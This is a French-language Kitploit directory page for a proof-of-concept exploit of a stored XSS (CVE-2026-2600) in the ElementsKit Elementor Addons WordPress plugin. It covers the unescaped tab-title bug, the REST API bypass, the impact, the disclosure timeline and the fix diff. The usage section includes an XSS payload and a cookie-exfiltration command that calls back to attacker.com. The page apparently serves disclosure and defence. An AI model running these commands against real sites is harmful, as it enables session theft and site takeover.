Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-2600-POC — Preuve de concept d'exploitation pour CVE-2026-2600, une XSS stockée dans ElementsKit Elementor Addons <= 3.7.9, permettant aux contributeurs authentifiés d'injecter des scripts arbitraires via des données Elementor spécialement conçues. | Kitploit
Outils/GitHubGitHub/folks-iwd/cve-2026-2600-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubfolks-iwd/cve-2026-2600-poc

CVE-2026-2600-POC

Preuve de concept d'exploitation pour CVE-2026-2600, une XSS stockée dans ElementsKit Elementor Addons <= 3.7.9, permettant aux contributeurs authentifiés d'injecter des scripts arbitraires via des données Elementor spécialement conçues.

Voir le dépôt
1il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-2600

ElementsKit Elementor Addons <= 3.7.9 — Cross-Site Scripting stocké (Contributeur+)

CVSS6.4 MOYEN
Versions concernées<= 3.7.9
Correctif3.8.0
Rôle minimalContributeur (edit_posts)
VecteurRéseau / Complexité faible / Privilèges faibles

Le bug

Le widget Simple Tab affiche les titres d'onglets avec du HTML généré par echo mais sans échappement de sortie. Dans widgets/tab/tab.php, la boucle de rendu fait :

root@kitploit:~
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
    echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
}

L'éditeur d'Elementor assainit les entrées côté client, mais le point de terminaison de l'API REST (/wp-json/wp/v2/posts/{id}) accepte directement le champ méta _elementor_data et contourne entièrement cette couche.

Un Contributeur authentifié peut modifier (PATCH) un article avec une charge utile JSON Elementor conçue qui définit ekit_tab_title sur du HTML arbitraire. Comme la valeur est stockée telle quelle dans _elementor_data et générée sans esc_html() au moment du rendu, le script s'exécute dans le navigateur de chaque visiteur au chargement de la page.

Impact

Tout Contributeur peut :

  • Voler les cookies de session et les jetons d'authentification de tous les visiteurs du site, y compris les administrateurs
  • Détourner les comptes administrateur et escalader jusqu'à la prise de contrôle totale du site
  • Déployer discrètement des keyloggers ou des superpositions de capture d'identifiants
  • Rediriger les visiteurs vers des pages de phishing ou des sites de distribution de malwares
  • Défigurer les pages de manière persistante — la charge utile survit jusqu'à son retrait manuel

Plus de 400 000 installations actives étaient concernées au moment de la divulgation.

Utilisation

root@kitploit:~
pip install requests
python3 poc.py https://target.com contributor p4ss

Le script s'authentifie via HTTP, récupère le nonce REST depuis l'éditeur d'administration, crée un article brouillon, modifie _elementor_data avec la charge utile XSS intégrée dans le champ ekit_tab_title, puis publie l'article. La sortie confirme si la charge utile est active dans le code source de la page.

root@kitploit:~
# Charge utile personnalisée
python3 poc.py https://target.com contributor p4ss --payload '<script>alert(document.domain)</script>'

# Exfiltration de cookies avec rappel
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal

# Mode console interactive
python3 console_poc.py

Article complet

https://folks-iwd.github.io/writeups/cve-2026-2600.html

Chronologie de divulgation

DateÉvénement
Janvier 2026Découvert via une revue des différences SVN. PoC confirmé.
Janvier 2026Signalé à Patchstack Alliance avec l'article complet et le PoC.
Mars 2026Wpmet a publié le correctif dans la v3.8.0.
Avril 2026CVE-2026-2600 publiée. CVSS 6.4 MOYEN attribué.

Le correctif

Wpmet a ajouté esc_html() autour de la sortie du titre d'onglet dans widgets/tab/tab.php :

root@kitploit:~
- echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
+ echo '<a ...>' . esc_html( $item['ekit_tab_title'] ) . '</a>';
Télécharger l’outil